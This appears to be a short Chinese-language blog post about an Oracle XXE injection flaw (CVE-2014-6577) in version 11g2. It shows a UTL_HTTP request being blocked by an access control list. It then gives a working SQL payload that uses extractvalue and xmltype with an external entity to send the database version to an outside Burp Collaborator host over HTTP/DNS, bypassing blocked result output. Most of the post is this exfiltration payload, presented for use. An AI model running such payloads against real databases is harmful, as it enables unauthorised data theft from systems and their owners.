头像

Mr_Tcsy

《ORACLE XXE注入(CVE-2014-6577)》

 4周前  •   信息安全  •     •   12  •   0

编号:CVE-2014-6577
影响范围:11g2 (其他版本未测试)
修复方法: 官方已发布安全补丁

    SQL> select UTL_HTTP.REQUEST('http://baidu.com') From dual;
    select UTL_HTTP.REQUEST('http://baidu.com') From dual*
    第 1 行出现错误:
    ORA-29273: HTTP 请求失败
    ORA-06512: 在 "SYS.UTL_HTTP", line 1722
    ORA-24247: 网络访问被访问控制列表 (ACL) 拒绝
    ORA-06512: 在 line 1
    当Oracle可执行SQL查询的时候但无法获取返回结果,且当前账户被降权的时候,可利用Oracle的XML注入结合DNSlog获取数据。
    Payload:
    select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://4chkqt9moslix6yf55pwgad17sdi17.burpcollaborator.net/'||(select version from v$instance)||'"> %remote; %param1;]>'),'/l') from dual
上一篇:
下一篇:

 评论


 已有0条评论

    还没有任何评论,你来说两句吧!